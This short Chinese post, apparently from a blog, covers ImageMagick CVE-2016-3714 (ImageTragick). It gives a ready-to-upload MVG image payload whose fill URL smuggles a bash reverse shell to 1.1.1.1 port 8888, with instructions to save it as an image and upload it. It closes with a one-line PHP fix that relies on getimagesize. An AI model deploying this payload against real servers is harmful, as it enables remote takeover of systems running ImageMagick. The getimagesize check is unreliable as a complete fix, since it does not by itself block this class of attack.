ImageMagick漏洞(cve-2016-3714)利用及修复

利用:

如下内容保存为图片格式上传即可(命令部分自行替换)

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'
pop graphic-context

修复(php):

上传时先利用getimagesize函数检查是否为正常图片

你可能感兴趣的:(安全漏洞,安全)